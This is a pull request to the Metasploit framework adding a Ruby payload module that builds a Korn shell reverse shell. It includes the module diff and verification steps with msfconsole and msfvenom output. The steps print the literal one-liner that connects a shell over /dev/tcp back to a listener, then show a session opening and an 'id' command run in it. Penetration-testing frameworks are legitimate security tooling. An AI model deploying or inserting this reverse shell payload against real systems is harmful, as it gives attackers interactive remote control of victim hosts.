### PR TITLE
Add a reverse shell payload via ksh(the korn shell)

### DIFF
--- a/modules/payloads/singles/cmd/unix/reverse_ksh.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_ksh.rb
@@ -1,5 +1,5 @@
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 

--- a/modules/payloads/singles/cmd/unix/reverse_ksh.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_ksh.rb
@@ -1,0 +1,44 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module MetasploitModule
+
+  CachedSize = 110
+
+  include Msf::Payload::Single
+  include Msf::Sessions::CommandShellOptions
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'        => 'Unix Command Shell, Reverse TCP (via Ksh)',
+      'Description' => %q{
+        Connect back and create a command shell via Ksh.  Note: Although Ksh is often
+        available, please be aware it isn't usually installed by default.
+      },
+      'Author'      => 'Wang Yihang <wangyihanger[at]gmail.com>',
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'unix',
+      'Arch'        => ARCH_CMD,
+      'Handler'     => Msf::Handler::ReverseTcp,
+      'Session'     => Msf::Sessions::CommandShell,
+      'PayloadType' => 'cmd',
+      'RequiredCmd' => 'ksh',
+      'Payload'     => { 'Offsets' => {}, 'Payload' => '' }
+    ))
+  end
+
+  def generate
+    return super + command_string
+  end
+
+  def command_string
+    # ksh -c 'ksh >/dev/tcp/${HOST}/${PORT} <&1'
+    cmd = "ksh -c 'ksh >/dev/tcp/#{datastore['LHOST']}/#{datastore['LPORT']} <&1'"
+  end
+end

--- a/modules/payloads/singles/cmd/unix/reverse_ksh.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_ksh.rb
@@ -34,11 +34,10 @@ module MetasploitModule
   end
 
   def generate
-    return super + command_string
+    super + command_string
   end
 
   def command_string
-    # ksh -c 'ksh >/dev/tcp/${HOST}/${PORT} <&1'
-    cmd = "ksh -c 'ksh >/dev/tcp/#{datastore['LHOST']}/#{datastore['LPORT']} <&1'"
+    "ksh -c 'ksh >/dev/tcp/#{datastore['LHOST']}/#{datastore['LPORT']} 2>&1 <&1'"
   end
 end

--- a/modules/payloads/singles/cmd/unix/reverse_ksh.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_ksh.rb
@@ -9,7 +9,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module MetasploitModule
 
-  CachedSize = 110
+  CachedSize = 52
 
   include Msf::Payload::Single
   include Msf::Sessions::CommandShellOptions


### PR DESCRIPTION
## Description
This is a simple payload that allows you to get a reverse shell via ksh (the korn shell).
If the target server(victim) does not have bash installed but have ksh installed, this payload will be useful.

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] `use multi/handler`
- [x] `set payload cmd/unix/reverse_ksh`
- [x] `set lhost 127.0.0.1`
- [x] `set lport 4444`
- [x] `run`
- [x] use the module. eg:
```
➜  metasploit-framework git:(master) ./msfconsole -q
msf5 > use multi/handler
msf5 exploit(multi/handler) > set payload cmd/unix/reverse_ksh 
payload => cmd/unix/reverse_ksh
msf5 exploit(multi/handler) > set lhost 127.0.0.1
lhost => 127.0.0.1
msf5 exploit(multi/handler) > run
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444 
```
- [x] gererate the payload eg:
```
➜  metasploit-framework git:(master) ./msfvenom -p cmd/unix/reverse_ksh LHOST=127.0.0.1 LPORT=4444
No platform was selected, choosing Msf::Module::Platform::Unix from the payload
No Arch selected, selecting Arch: cmd from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 41 bytes
ksh -c 'ksh >/dev/tcp/127.0.0.1/4444 <&1'
```
- [x] execute the payload. eg:
```
$ ksh -c 'ksh >/dev/tcp/127.0.0.1/4444 <&1'

```
- [x] **Verify** shell session created in metasploit. eg
```
[*] Command shell session 1 opened (127.0.0.1:4444 -> 127.0.0.1:52930) at 2018-05-15 17:44:10 +0800

id
uid=1000(sun) gid=1000(sun) groups=1000(sun),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)
```
- [ ] **Document** the thing and how it works ([Example](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/multi/gather/aws_keys.md))